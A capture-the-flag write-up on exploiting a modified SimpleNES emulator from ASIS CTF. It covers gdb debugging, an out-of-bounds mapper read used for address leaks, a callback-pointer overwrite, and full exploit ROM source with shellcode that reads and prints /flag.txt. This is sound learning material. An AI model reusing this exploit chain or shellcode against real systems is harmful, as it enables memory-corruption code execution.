Introduction

Last weekend, I participated in Asis CTF. While I did not manage to solve this challenge during competition time, I did manage to up solve it with some limited help from the author!

Credits

During the CTF I made the mistake of primarily trying to write my exploit in assembly. This is obviously not ideal in retrospect, as using a high level language like C takes away the responsibility of managing the stack, and gives me access to 32bit integer types. The player that solved the challenge, ptr-yudai, posted their solution, and I in turn used some of the helper functions they had made. However, my exploitation method, and vulnerability were different. Since I used some of their code and templating, I wanted to give credit where it is due! Please check out their amazing blog @ https://ptr-yudai.hatenablog.com/

About

This challenge involves exploiting a NES emulator called SimpleNES. In addition to the standard source code, there is the addition of 2 opcodes, bka and bkx, as well as a 64bit register bk_off. The language for the NES is 6502 assembly, which consists of several 8bit registers, of chief concern being AC(r_A), the accumulator. For more information, the language spec is detailed here.

The challenge consists of creating a ROM that exploits the Emulator. Once the ROM has been submitted, no further action is allowed from the client side. In other words, everything has to be handled by the ROM. Something I later realized is that stdin is also closed, making any kind of input impossible.

//CPU.cpp
            case BKA:
                bk_off = (bk_off << 8) + r_A;
                break;
            case BKX:
                m_bus.xorAt(bk_off, r_A);
                break;
    void MainBus::xorAt(uint64_t off, Byte value)
    {
        // Exfil the byte and hide the output from user
        syscall(STDOUT_FILENO,1,(void *)&m_RAM[off],1); 
        syscall(STDOUT_FILENO,1,(void *)"\r",1); 
        m_RAM[off] ^= value;
    }

The bka opcode shifts the bk_off registers left by 8 bits, and appends the AC register to the end. The bkx opcode triggers a call the the MainBus’s xorAt function which xor’s the memory at address m_ram+bk_off by the value in AC. It also leaks the value back to the user, but not the ROM. These 2 are combined to give an arbitrary write primitive.

Trigger vuln from ROM

;pwn_asm.s
.export _bka
.export _bkx

_bka:
    .byte $13
    rts

_bkx:
    .byte $37
    rts
//pwn.c
extern void bka(uint8_t a);
extern void bkx(uint8_t a);

void reset() {
  //bka(0); bka(0); bka(0); bka(0);
  bka(0); bka(0); bka(0); bka(0);
}

void xorAt64(uint32_t ofs_low, uint32_t ofs_high, uint8_t value) {
  int i;
  for (i = 0; i < 4; i++) bka((ofs_high >> ((3-i)*8)) & 0xff);
  for (i = 0; i < 4; i++) bka((ofs_low >> ((3-i)*8)) & 0xff);
  bkx(value);
  reset();
}

void xorAt(uint32_t offset, uint8_t value) {
  int i;
  for (i = 0; i < 4; i++) bka((offset >> ((3-i)*8)) & 0xff);
  bkx(value);
  reset();
}

Constraints

While we do get to write anywhere, there is no given way to leak addresses into the ROM memory. This is necessary to write to higher addresses. This will be addressed later.

compiling the ROM

the ROM can be compiled with the cc65 package. I used the following makefile to build it. (Thanks again to ptr-yudai for helping me figure out how to get C compilation working)

all:
	cc65 -O -t c64 pwn.c
	ca65 -t c64 pwn.s
	ca65 -t c64 pwn_asm.s
	cl65 -o ../pwn.nes -t nes pwn.o pwn_asm.o

Attack Vector

To start out with, I wanted to discuss my chosen attack vector. I noticed that for reading and writing special physical address’s, a series of callbacks were created. This struck me as a solid target, because overwriting one should give me a way to trigger code!

Callback assignment

    Emulator::Emulator() :
        m_cpu(m_bus),
        m_ppu(m_pictureBus, m_emulatorScreen),
        m_screenScale(3.f),
        m_cycleTimer(),
        m_cpuCycleDuration(std::chrono::nanoseconds(559))
    {
        if(!m_bus.setReadCallback(PPUSTATUS, [&](void) {return m_ppu.getStatus();}) ||
            !m_bus.setReadCallback(PPUDATA, [&](void) {return m_ppu.getData();}) ||
            !m_bus.setReadCallback(JOY1, [&](void) {return m_controller1.read();}) ||
            !m_bus.setReadCallback(JOY2, [&](void) {return m_controller2.read();}) ||
            !m_bus.setReadCallback(OAMDATA, [&](void) {return m_ppu.getOAMData();}))
        {
            LOG(Error) << "Critical error: Failed to set I/O callbacks" << std::endl;
        }


        if(!m_bus.setWriteCallback(PPUCTRL, [&](Byte b) {m_ppu.control(b);}) ||
            !m_bus.setWriteCallback(PPUMASK, [&](Byte b) {m_ppu.setMask(b);}) ||
            !m_bus.setWriteCallback(OAMADDR, [&](Byte b) {m_ppu.setOAMAddress(b);}) ||
            !m_bus.setWriteCallback(PPUADDR, [&](Byte b) {m_ppu.setDataAddress(b);}) ||
            !m_bus.setWriteCallback(PPUSCROL, [&](Byte b) {m_ppu.setScroll(b);}) ||
            !m_bus.setWriteCallback(PPUDATA, [&](Byte b) {m_ppu.setData(b);}) ||
            !m_bus.setWriteCallback(PUTC, [&](Byte b) {putchar(b);}) ||
            !m_bus.setWriteCallback(OAMDMA, [&](Byte b) {DMA(b);}) ||
            !m_bus.setWriteCallback(JOY1, [&](Byte b) {m_controller1.strobe(b); m_controller2.strobe(b);}) ||
            !m_bus.setWriteCallback(OAMDATA, [&](Byte b) {m_ppu.setOAMData(b);}))
        {
            LOG(Error) << "Critical error: Failed to set I/O callbacks" << std::endl;
        }

        m_ppu.setInterruptCallback([&](){ m_cpu.interrupt(InterruptType::NMI); });
    }

So, I decided to check this out with a debugger. As a quick aside, for debugging these challenges where a dockerfile is provided, I like to modify it to install git, gdb, and vim and debug from within the docker instance. Sometimes I debug locally as well, but for the most part I think it is better to stay true to environment as much as possible.

ROM script to debug

//JOY1 = 0x4016
void debug(){
    while(1) *(uint8_t*)JOY1 = 1;
}

int main(void) {
    debug();
}

All this does is loop a write call to JOY1, this will allow me to test my attack idea.

I found the callback list in memory by using the information provided. By searching for the pointer to m_ram I can find the MainBus allocation, which has a pointer to the callback table

gdb-peda$ find 0x5555570e1220
Searching for '0x5555570e1220' in: None ranges
Found 1 results, display max 1 items:
[stack] : 0x7ffdb5a026d0 --> 0x5555570e1220 --> 0x7da0000
gdb-peda$ x/10gx 0x7ffdb5a026d0
0x7ffdb5a026d0: 0x00005555570e1220      0x00005555570e1a20
0x7ffdb5a026e0: 0x00005555570e1a20      0x00005555574e1bf0
0x7ffdb5a026f0: 0x00005555574e3bf0      0x00005555574e3bf0
0x7ffdb5a02700: 0x00005555571840a0      0x00005555574dc170
0x7ffdb5a02710: 0x000000000000000d      0x00005555574dc3e0
gdb-peda$ x/10gx 0x00005555574dc3e0
0x5555574dc3e0: 0x00005555574dc3a0      0x00007ffb00002004
0x5555574dc3f0: 0x00007ffdb5a026d0      0x0000000000000000
0x5555574dc400: 0x00007ffbceb8d3d8      0x00007ffbceb8d396
0x5555574dc410: 0x00005555574d9d80      0x0000000000000031
0x5555574dc420: 0x706d742f706d742f      0x6b6d6f3533763835
gdb-peda$ x/10gx 0x00005555574dc3a0
0x5555574dc3a0: 0x00005555574dc360      0x00007ffb00004016 <- addr 0x4016!
0x5555574dc3b0: 0x00007ffdb5a026d0      0x0000000000000000
0x5555574dc3c0: 0x00007ffbceb8d2c9      0x00007ffbceb8d287 <- function ptrs
0x5555574dc3d0: 0x00005555574d9d40      0x0000000000000041
0x5555574dc3e0: 0x00005555574dc3a0      0x00007ffb00002004

To test my Idea, I just need to change the function pointers to joke values

gdb-peda$ set *0x5555574dc3c0 = 0x4141414141
gdb-peda$ set *0x5555574dc3c4 = 0x4141414141
gdb-peda$ set *0x5555574dc3c8 = 0x4242424242
gdb-peda$ set *0x5555574dc3cc = 0x4242424242
gdb-peda$ x/10gx 0x00005555574dc3a0
0x5555574dc3a0: 0x00005555574dc360      0x00007ffb00004016
0x5555574dc3b0: 0x00007ffdb5a026d0      0x0000000000000000
0x5555574dc3c0: 0x4141414141414141      0x4242424242424242
0x5555574dc3d0: 0x00005555574d9d40      0x0000000000000041
0x5555574dc3e0: 0x00005555574dc3a0      0x00007ffb00002004

Since, I am looping over a write to JOY1, let see if continuing gives a crash.

gdb-peda$ c
Continuing.

Thread 1 "ld-linux-x86-64" received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x5555574dc3b0 --> 0x7ffdb5a026d0 --> 0x5555570e1220 --> 0x7da0000
RBX: 0x4242424242424242 ('BBBBBBBB')
RCX: 0x5555574dc3a8 --> 0x7ffb00004016
RDX: 0x7ffdb5a01dc4 --> 0x574dc3b000007f01
RSI: 0x7ffdb5a01dc4 --> 0x574dc3b000007f01
RDI: 0x5555574dc3b0 --> 0x7ffdb5a026d0 --> 0x5555570e1220 --> 0x7da0000
RBP: 0x7ffdb5a01de0 --> 0x7ffdb5a01e20 --> 0x7ffdb5a01e70 --> 0x7ffdb5a01eb0 --> 0x7ffdb5a01f70 --> 0x7ffdb5a02bb0 (--> ...)
RSP: 0x7ffdb5a01dc0 --> 0x7f01b5a01de0
RIP: 0x7ffbceb96de4 (call   rbx)
R8 : 0xff
R9 : 0x7ffb910f2010 --> 0x0
R10: 0x7ffdb5a01e90 --> 0x8d007ffdb5a02840
R11: 0x7ffdb5b8c080 (MemError)
R12: 0x1
R13: 0x7ffbceb80f29 (endbr64)
R14: 0x7ffbcebb7310 --> 0x7ffbceb80ee0 (endbr64)
R15: 0x7ffbcebf3040 --> 0x7ffbcebf42f0 --> 0x7ffbceb5d000 --> 0x10102464c457f
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x7ffbceb96dda:      mov    rax,QWORD PTR [rbp-0x18]
   0x7ffbceb96dde:      mov    rsi,rdx
   0x7ffbceb96de1:      mov    rdi,rax
=> 0x7ffbceb96de4:      call   rbx
   0x7ffbceb96de6:      nop
   0x7ffbceb96de7:      mov    rbx,QWORD PTR [rbp-0x8]
   0x7ffbceb96deb:      leave
   0x7ffbceb96dec:      ret
Guessed arguments:
arg[0]: 0x5555574dc3b0 --> 0x7ffdb5a026d0 --> 0x5555570e1220 --> 0x7da0000
arg[1]: 0x7ffdb5a01dc4 --> 0x574dc3b000007f01
arg[2]: 0x7ffdb5a01dc4 --> 0x574dc3b000007f01
[------------------------------------stack-------------------------------------]
0000| 0x7ffdb5a01dc0 --> 0x7f01b5a01de0
0008| 0x7ffdb5a01dc8 --> 0x5555574dc3b0 --> 0x7ffdb5a026d0 --> 0x5555570e1220 --> 0x7da0000
0016| 0x7ffdb5a01dd0 --> 0x7ffdb5a01e10 --> 0x0
0024| 0x7ffdb5a01dd8 --> 0x7ffdb5a026d0 --> 0x5555570e1220 --> 0x7da0000
0032| 0x7ffdb5a01de0 --> 0x7ffdb5a01e20 --> 0x7ffdb5a01e70 --> 0x7ffdb5a01eb0 --> 0x7ffdb5a01f70 --> 0x7ffdb5a02bb0 (--> ...)
0040| 0x7ffdb5a01de8 --> 0x7ffbceb95d04 (jmp    0x7ffbceb96013)
0048| 0x7ffdb5a01df0 --> 0x4016b5a01e01
0056| 0x7ffdb5a01df8 --> 0x7ffdb5a026d0 --> 0x5555570e1220 --> 0x7da0000
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x00007ffbceb96de4 in ?? ()
gdb-peda$

Perfect, SEGFAULT on a call to rbx with the injected value inside. Proving the exploitation vector’s validity.

Bad News

Since I have no way to leak any values, there is really nothing of use I can put in here quite yet. I looked for awhile to see if there were any gadgets I could use that only relied on the lower 12 bits to be changed, but couldn’t find anything. This is were I got stuck during the CTF. I tried many things revolving reading from MainBus memory, but got nowhere. I knew I needed the leak, but couldn’t find it…

Dream Come True

After a long night filled with restless thoughts of a challenge yet completed, I awoke to a joyous sight. In addition to some details from the only person who solved the challenge, ptr-yudai, the challenge author said, Intended way to get leaks was using oob in dream memory handler. It doesn't bound check its x * 0x2000+y. So, I set forth on a mission to figure out how to get the leaks from this.

I found the vulnerable code segment which matches the description in readCHR.

//MapperColorDreams.cpp
    Byte MapperColorDreams::readCHR(Address address)
    {
        if (address <= 0x1FFF)
        {
            return   m_cartridge.getVROM()[(chrbank * 0x2000) + address];
        }

        return 0;
    }

MapperColorDreams class

class MapperColorDreams : public Mapper
{
public:
    MapperColorDreams(Cartridge &cart, std::function<void(void)> mirroring_cb);
    NameTableMirroring getNameTableMirroring();
    void writePRG(Address address, Byte value);
    Byte readPRG(Address address);
    Byte readCHR(Address address);
    void writeCHR(Address address, Byte value);
private:
    NameTableMirroring m_mirroring;
    uint32_t prgbank;
    uint32_t chrbank; //<- value used for calculating the chrbank offset
    std::function<void(void)> m_mirroringCallback;
};

The Cartridge mapper is select at runtime based on the ROM header. If a value of 11, 0xb, is specified, on creation of the mapper this mapper will be chosen. I set this value in python before uploading the ROM

upload.py

r = remote("localhost", 1337)

with open("./pwn.nes", "rb") as f:
    data = list(f.read())
    #patch in dream mapper
    data[6] = (data[6] & 0x0f) | (11 << 4) 
    to_send = hexlify(bytes(data))
    #log.info(f"sending data> {to_send}")
    r.sendlineafter(':\n', to_send)
    with open("./test.nes", "wb") as out:
        out.write(bytes(data))
    f.close()

A key thing to note is that the Mapper is dynamically allocated. This can be confirmed by looking at the disassembly. See the operator.new() call

disassembly

Bug

the OOB is pretty simple, by corrupting the chrbank value on the heap using our write primitive, we can the read outside of the allocated CHR memory. All that is needed is the offset to the heap object for the dream mapper, and then the xor primitive can be used to set chrbank to whatever we want. In this case 1 will suffice.

xorAt64(DREAM_OFF+0x1c, 0, LD_PAGE & 0xff);

The next step is to read from chr memory, which can be done like this

uint8_t get_data(uint16_t addr){
	//write the address to PPUADDR
    uint8_t a = (addr >> 8) & 0xff, b = addr &0xff;
    *(uint8_t*)(PPUADDR) = a;
    *(uint8_t*)(PPUADDR) = b;
	//read the value at chrbank+addr and return
    return *(uint8_t*)PPUDATA;
}
//helper function to handle leaking
void leak(uint16_t offset, uint32_t* high, uint32_t* low){
    uint8_t i = 0;
    get_data(0);
    for(i = 0; i < 4; i++)
        *low |= (uint32_t)get_data(offset+i+1)<<(i*8);
    for(i = 0; i < 4; i++)
        *high |= (uint32_t)get_data(offset+i+5)<<(i*8);
    get_data(0);
}

Next, calculate the addresses for the values to be leaked. In my case, I chose 2 values, ld and heap. I will explain my choice in the next section.

leak vals

uint32_t rwx_low, rwx_high;
uint32_t mram_low, mram_high;

rwx_low = rwx_high = 0;
//ld
leak(LD_OFF, &rwx_high, &rwx_low);
rwx_low -= RWX_OFF;
rwx_low &= 0xFFFFFF00;

mram_low = mram_high = 0;
//heap
leak(HEAP_OFF, &mram_high, &mram_low);
mram_low -= M_RAM_OFF; //set the heap leak to m_RAM

What I missed

The key thing I missed during the competition was the presence of the PPU and PictureBus. I will leave it you to review the source code and figure out what they do, but the important thing is that they provide another way to read memory. During the CTF I searched for bugs in the MainBus, overlooking CHR memory entirely. Had I looked a bit closer at the read/write callbacks I had access too I might have noticed the PPUADDR and PPUDATA callbacks. Thus, my resolution for 2024 is to read more source code!

RWX

One thing I noticed while poking around with the debugger is that there is a RWX segment of memory in ld. As discussed before, I can overwrite the callback function for JOY1 to call anywhere I want, so why not call some shellcode? This is exactly what I ended up doing.

To do this, I will use the aforementioned xorAt function to write the shellcode to the section. for this, I need to calculate the offset between RAM and RWX.

uint32_t mram_rwx_off_low, mram_rwx_off_high;

sub64(rwx_low, rwx_high, mram_low, mram_high, &mram_rwx_off_low, &mram_rwx_off_high);

next, I write the shellcode to this offset, there is some existing data there, but it is easy enough to handle. The data is always the same, so I can xor my shellcode against the data before sending it.

uint8_t i,j;

for(i = 0; i < SHELLCODE_SZ; i++)
  shellcode[i] ^= pattern[i%0x10];

//create nopsled
for(i = 0; i < 0x10; i++)
	pattern[i] ^= 0x90;

//sometimes values are slightly different, so I spray a few times
for(j = 0; j < SPRAY_CNT;j++){
    for(i = 0; i < 0xb0; i++){
        xorAt64(mram_rwx_off_low+i, mram_rwx_off_high, pattern[i%0x10]);
    }
    mram_rwx_off_low+= 0xb0;
        //write shellcode
    for(i = 0; i < SHELLCODE_SZ; i++)
        xorAt64(mram_rwx_off_low+i, mram_rwx_off_high, shellcode[i]);
    mram_rwx_off_low += 0x50;
}
mram_rwx_off_low -= SPRAY_CNT*0x100;

shellcode

   0:   48 31 d2                xor    rdx,rdx
   3:   48 31 c0                xor    rax,rax
   6:   48 31 f6                xor    rsi,rsi
   9:   48 bb 6c 6f 6c 6c 6f    movabs rbx,0x746c6c6f6c6c6f6c ;'lollollt'
  10:   6c 6c 74
  13:   48 c1 eb 38             shr    rbx,0x38
  17:   53                      push   rbx
  18:   48 bb 2f 66 6c 61 67    movabs rbx,0x78742e67616c662f ;'/flag.txt'
  1f:   2e 74 78
  22:   53                      push   rbx
  23:   48 89 e7                mov    rdi,rsp
  26:   b0 02                   mov    al,0x2
  28:   0f 05                   syscall ;int fd = open('/flag.txt', O_RDONLY, 0);
  2a:   48 89 c7                mov    rdi,rax
  2d:   48 31 c0                xor    rax,rax
  30:   48 89 e6                mov    rsi,rsp
  33:   ba 00 01 00 00          mov    edx,0x100
  38:   0f 05                   syscall ;read(fd, &rsp, 0x100);
  3a:   48 89 c2                mov    rdx,rax
  3d:   b8 01 00 00 00          mov    eax,0x1
  42:   bf 01 00 00 00          mov    edi,0x1
  47:   0f 05                   syscall ;write(STDOUT, &rsp, 0x100);
//aligned to 0x10, necessary
uint8_t shellcode[] = { 0x90,
    0x48,0x31,0xd2,0x48,0x31,0xc0,0x48,0x31,
    0xf6,0x48,0xbb,0x6c,0x6f,0x6c,0x6c,0x6f,
    0x6c,0x6c,0x74,0x48,0xc1,0xeb,0x38,0x53,
    0x48,0xbb,0x2f,0x66,0x6c,0x61,0x67,0x2e,
    0x74,0x78,0x53,0x48,0x89,0xe7,0xb0,0x02,
    0x0f,0x05,0x48,0x89,0xc7,0x48,0x31,0xc0,
    0x48,0x89,0xe6,0xba,0x00,0x01,0x00,0x00,
    0x0f,0x05,0x48,0x89,0xc2,0xb8,0x01,0x00,
    0x00,0x00,0xbf,0x01,0x00,0x00,0x00,0x0f,
    0x05,0x00,0x00,0x00,0x00,0x00,0x00,};

uint8_t pattern[] = {0x64,0x4c,0x8b,0x1c,0x25,0x28,0xff,0xff,0xff,0x41,0xff,0xa3,0x18,0x3c,0x00,0x00}; //the bytes found in libc

Last Step

All that is left is to overwrite the JOY1 callback function with the address of the shellcode. This is easier than one may expect, as the LD library is located right next to the Main Binary for SimpleNES. So, the address of the callback function can be computed based off previously leaked RWX address. From there, I xor the function pointer against the shellcode address, and use the xorAt primitive to corrupt the callback function for JOY1 write!

uint32_t joycon_cb_fn_low, overwrite;

overwrite = rwx_low;
joycon_cb_fn_low = rwx_low - JOYCON_CB_RWX_DIFF;
overwrite ^= joycon_cb_fn_low;
overwrite |= 0x800;
for(i = 0; i < 4; i++)
    xorAt64(FUNC_OVERWRITE_OFF+i, 0, (overwrite >> (i*8)) & 0xFF);

And that’s it! all that’s left to do is call the callback for JOY1 and enjoy our code execution.

*(uint8_t*)JOY1 = i;
while(1);
return 0;

Moment of Truth

[gold3nboy@arch exp]$ ./upload.py
cc65 -O -t c64 pwn.c
ca65 -t c64 pwn.s
ca65 -t c64 pwn_asm.s
cl65 -o ../pwn.nes -t nes pwn.o pwn_asm.o
[+] Opening connection to localhost on port 1337: Done
/usr/lib/python3.11/site-packages/pwnlib/tubes/tube.py:841: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  res = self.recvuntil(delim, timeout=timeout)
[MainBus.cpp:12] Allocated m_RAM at: 0x555556100220
[Cartridge.cpp:52] Reading ROM from path: /tmp/tmpmctjnwke
[Cartridge.cpp:70] Reading header, it dictates:
[Cartridge.cpp:73] 16KB PRG-ROM Banks: 2
[Cartridge.cpp:81] 8KB CHR-ROM Banks: 1
[Cartridge.cpp:91] Name Table Mirroring: Vertical
[Cartridge.cpp:95] Mapper #: 11
[Cartridge.cpp:98] Extended (CPU) RAM: true
[Cartridge.cpp:112] ROM is NTSC compatible.
[Cartridge.cpp:121] Allocated m_PRG_ROM at: 0x555556502bd0
[Cartridge.cpp:127] Allocated m_CHR_ROM at: 0x55555650abe0
Error while enumerating udev devices
Setting vertical sync not supported
\x00
[*] rwx: 0x7faf77a11a00
[*] m_RAM: 0x555556100220
[*] m_RAM_rwx_off: 0x2a5a219117e0
[*] Switching to interactive mode
GGGGGASIS{test-flag}

One more thing, a shell can not be spawned as stdin is closed. It could be reopened, but I decided to just read and write the flag with shellcode instead. There is plenty of space to do whatever in the shellcode, so I’ll leave that to you.

Aside

Due to not know the heap layout on the remote server, I have been unable to get my exploit working on remote. I have tried dumping the entire heap, but can’t find where the Mapper is being allocated too(I searched manually as well for a long time). If anyone has any advice for this, I’d love to hear it. For now, I am content with getting my exploit working on my local docker instance, as I feel I have completed the challenge.

Aside-Aside

After I had given up, I finally had the idea to set if I could set chrbank some other way. It turns out I can, and I was being stubborn trying to find the heap allocation for the way I had working, when setting the value as intended is much easier. There is only one real change.

//xorAt64(DREAM_OFF+0x1c, 0, LD_PAGE & 0xff);
*(uint8_t*)0x9001 = 0x10; //write 0x10 to an address above 0x8000
//this is the code that is triggered
void MapperColorDreams::writePRG(Address address, Byte value)
{
    if (address >= 0x8000)
    {
        prgbank = ((value >> 0) & 0x3);
        chrbank = ((value  >> 4) & 0xF);
    }
}

From there, I just had to calculate the offsets for the function pointer and the heap and change them.

Flag: ASIS{e8a46ded54d3acec15419e6b09818901}

Another good lesson in thinking about all possible attack patterns, instead of focusing on the first one I find.

Summary

What I learned

I learned a bit about how some addresses are considered special by CPU’s and trigger bus write’s and read’s. This is something I want to dig more into, as was cool to see it in action. I also learned a lot about the 6502 instruction architecture which was surprisingly interesting. It’s crazy how much computers have improved over the last 40 years.

Most importantly, I learned to check for all possible read’s and write’s, instead of focusing only on what’s readily available. If I had spent more time looking at the PPU, I think I may have been able to find the OOB read. In reality, I hardly glanced at the Cartridge mappers during the competition time.

Overall I really enjoyed the challenge, and it was also fun to continue working on it after the CTF had finished!

FULL CODE


#include <stdint.h>

extern void bka(uint8_t a);
extern void bkx(uint8_t a);

#define REMOTE

#define HEAP_LIBC_PAGE 0x4
#define HEAP_LIBC_OFF 0x1E50

#ifdef REMOTE
#define M_RAM_OFF 0x551f0
#define FUNC_OVERWRITE_OFF 0x3EB9D8
#endif
#ifndef REMOTE
#define M_RAM_OFF 0x553e0
#define FUNC_OVERWRITE_OFF 0x3FB108
#endif
#define DREAM_OFF 0xA2D60
#define LD_PAGE 0x1
#define LD_OFF 0x3f0
#define HEAP_OFF 0x3d0
#define RWX_OFF 0x3000
#define LIBC_OFF 0x217000
#define SYSTEM_OFF 0x28670
#define JOYCON_CB_RWX_DIFF 0x62D79
#define SHELLCODE_SZ 0x4a
#define SPRAY_CNT 3

enum IORegisters
{
    PPUCTRL = 0x2000,
    PPUMASK,
    PPUSTATUS,
    OAMADDR,
    OAMDATA,
    PPUSCROL,
    PPUADDR,
    PPUDATA,
    OAMDMA = 0x4014,
    PUTC = 0x4015,
    JOY1 = 0x4016,
    JOY2 = 0x4017,
};

/*[*] 0x30: 0x00007f69a1cdc3e8 0x00007ffe928407e0
[*] 0x40: 0x000000010000000b 0x0000000000000000
[*] 0x50: 0x00007ffe92840610 0x0000000000000000
[*] 0x60: 0x00007f69a1cb26b4 0x00007f69a1cb268d
*/
/*
0000000000000000 <_start>:
   0:   48 31 d2                xor    %rdx,%rdx
   3:   48 31 c0                xor    %rax,%rax
   6:   48 31 f6                xor    %rsi,%rsi
   9:   48 bb 6c 6f 6c 6c 6f    movabs $0x746c6c6f6c6c6f6c,%rbx
  10:   6c 6c 74
  13:   48 c1 eb 38             shr    $0x38,%rbx
  17:   53                      push   %rbx
  18:   48 bb 2f 66 6c 61 67    movabs $0x78742e67616c662f,%rbx
  1f:   2e 74 78
  22:   53                      push   %rbx
  23:   48 89 e7                mov    %rsp,%rdi
  26:   b0 02                   mov    $0x2,%al
  28:   0f 05                   syscall
  2a:   48 89 c7                mov    %rax,%rdi
  2d:   48 31 c0                xor    %rax,%rax
  30:   48 89 e6                mov    %rsp,%rsi
  33:   ba 00 01 00 00          mov    $0x100,%edx
  38:   0f 05                   syscall
  3a:   48 89 c2                mov    %rax,%rdx
  3d:   b8 01 00 00 00          mov    $0x1,%eax
  42:   bf 01 00 00 00          mov    $0x1,%edi
  47:   0f 05                   syscall
*/
//aligned to 0x10, necessary
uint8_t shellcode[] = { 0x90,
    0x48,0x31,0xd2,0x48,0x31,0xc0,0x48,0x31,
    0xf6,0x48,0xbb,0x6c,0x6f,0x6c,0x6c,0x6f,
    0x6c,0x6c,0x74,0x48,0xc1,0xeb,0x38,0x53,
    0x48,0xbb,0x2f,0x66,0x6c,0x61,0x67,0x2e,
    0x74,0x78,0x53,0x48,0x89,0xe7,0xb0,0x02,
    0x0f,0x05,0x48,0x89,0xc7,0x48,0x31,0xc0,
    0x48,0x89,0xe6,0xba,0x00,0x01,0x00,0x00,
    0x0f,0x05,0x48,0x89,0xc2,0xb8,0x01,0x00,
    0x00,0x00,0xbf,0x01,0x00,0x00,0x00,0x0f,
    0x05,0x00,0x00,0x00,0x00,0x00,0x00,};

uint8_t pattern[] = {0x64,0x4c,0x8b,0x1c,0x25,0x28,0xff,0xff,0xff,0x41,0xff,0xa3,0x18,0x3c,0x00,0x00}; //the bytes found in libc

void reset() {
  //bka(0); bka(0); bka(0); bka(0);
  bka(0); bka(0); bka(0); bka(0);
}

void sub64(uint32_t al, uint32_t ah, uint32_t bl, uint32_t bh,
           uint32_t *xl, uint32_t *xh) {
  *xl = al - bl;
  if (al < bl) {
    *xh = ah - bh - 1;
  } else {
    *xh = ah - bh;
  }
}

void xorAt64(uint32_t ofs_low, uint32_t ofs_high, uint8_t value) {
  int i;
  for (i = 0; i < 4; i++) bka((ofs_high >> ((3-i)*8)) & 0xff);
  for (i = 0; i < 4; i++) bka((ofs_low >> ((3-i)*8)) & 0xff);
  bkx(value);
  reset();
}

void xorAt(uint32_t offset, uint8_t value) {
  int i;
  for (i = 0; i < 4; i++) bka((offset >> ((3-i)*8)) & 0xff);
  bkx(value);
  reset();
}

void putchar(uint8_t c) {
  *(uint8_t*)(0x4015) = c;
}

uint8_t get_data(uint16_t addr){
    uint8_t a = (addr >> 8) & 0xff, b = addr &0xff;
    *(uint8_t*)(PPUADDR) = a;
    *(uint8_t*)(PPUADDR) = b;
    return *(uint8_t*)PPUDATA;
}


//void set_ppu_data(uint8_t chef){
//    *(uint8_t*)PPUDATA = chef;
//}
//
//uint8_t libc_addr[8];

void leak(uint16_t offset, uint32_t* high, uint32_t* low){
    uint8_t i = 0;
    get_data(0);
    for(i = 0; i < 4; i++)
        *low |= (uint32_t)get_data(offset+i+1)<<(i*8);
    for(i = 0; i < 4; i++)
        *high |= (uint32_t)get_data(offset+i+5)<<(i*8);
    get_data(0);
}

void log64(uint32_t high, uint32_t low){
    uint8_t i = 0;
    putchar(0x46);
    putchar(0x46);
    for(i = 0; i < 4; i++)
        putchar((low >> (i*8)) & 0xFF);
    for(i = 0; i < 4; i++)
        putchar((high >> (i*8)) & 0xFF);
    putchar(0x41);
    putchar(0x42);
    putchar(0x43);
}

void dump(uint32_t base){
    uint8_t i;
    for(i = 0; i < 0xff; i++){
        xorAt(base+i, 0);
    }
    xorAt(base+0xff, 0);
}

void debug(){
    while(1) *(uint8_t*)JOY1 = 1;
}

void redemption(){
    *(uint8_t*)0x9001 = 0x10;
}

int main(void) {
    uint32_t rwx_low, rwx_high;
    uint32_t mram_low, mram_high;
    uint32_t mram_rwx_off_low, mram_rwx_off_high;
    uint32_t joycon_cb_fn_low, overwrite;
    uint8_t i,j;

    //debug();

    //xorAt64(DREAM_OFF+0x1c, 0, LD_PAGE & 0xff);
    redemption();


    rwx_low = rwx_high = 0;
    leak(LD_OFF, &rwx_high, &rwx_low);
    rwx_low -= RWX_OFF;
    rwx_low &= 0xFFFFFF00;

    mram_low = mram_high = 0;
    leak(HEAP_OFF, &mram_high, &mram_low);
    mram_low -= M_RAM_OFF; //set the heap leak to m_RAM

    log64(rwx_high, rwx_low);
    log64(mram_high, mram_low);

    sub64(rwx_low, rwx_high, mram_low, mram_high, &mram_rwx_off_low, &mram_rwx_off_high);
    log64(mram_rwx_off_high, mram_rwx_off_low);

    //prep shellcode with the pattern found at rwx section
    for(i = 0; i < SHELLCODE_SZ; i++)
        shellcode[i] ^= pattern[i%0x10];

    
    //create nop
    for(i = 0; i < 0x10; i++)
        pattern[i] ^= 0x90;

    for(j = 0; j < SPRAY_CNT;j++){
        for(i = 0; i < 0xb0; i++){
            xorAt64(mram_rwx_off_low+i, mram_rwx_off_high, pattern[i%0x10]);
        }
        mram_rwx_off_low+= 0xb0;
            //write shellcode
        for(i = 0; i < SHELLCODE_SZ; i++)
            xorAt64(mram_rwx_off_low+i, mram_rwx_off_high, shellcode[i]);
        mram_rwx_off_low += 0x50;
    }
    mram_rwx_off_low -= SPRAY_CNT*0x100;

    //for finding Mapper allocation on blind remote
#ifdef DUMP
    putchar(0x44);
    putchar(0x44);
    for(i = 0; i < 8; i++)
        dump(FUNC_OVERWRITE_OFF + i*0x100);
    putchar(0x45);
    putchar(0x45);
#endif

    //overwrite callback function
    overwrite = rwx_low;
    joycon_cb_fn_low = rwx_low - JOYCON_CB_RWX_DIFF;
    overwrite ^= joycon_cb_fn_low;
    overwrite |= 0x800;
    for(i = 0; i < 4; i++)
        xorAt64(FUNC_OVERWRITE_OFF+i, 0, (overwrite >> (i*8)) & 0xFF);
    

    putchar(0x47);
    putchar(0x47);
    putchar(0x47);
    putchar(0x47);
    putchar(0x47);
    //trigger
    *(uint8_t*)JOY1 = i;
    while(1);
    return 0;
}

    .export _bka
    .export _bkx
    .export _nop

_bka:
    .byte $13
    rts

_bkx:
    .byte $37
    rts

_nop:
    nop
    nop
    nop
    nop
    nop
    nop
    nop
    nop
    nop
    nop
    nop
    nop
    nop
    nop
    rts

section .text
    global _start

_start:
;rd_only
    xor     rdx, rdx
    xor     rax, rax
    xor     rsi, rsi
    mov     qword rbx, 'lollollt'
    shr     rbx, 0x38
    push    rbx
    mov     qword rbx, '/flag.tx'
    push    rbx
    ;filename now in rdi
    mov     rdi, rsp
    mov     al, 0x2
    syscall
    mov     rdi, rax
    xor     rax, rax
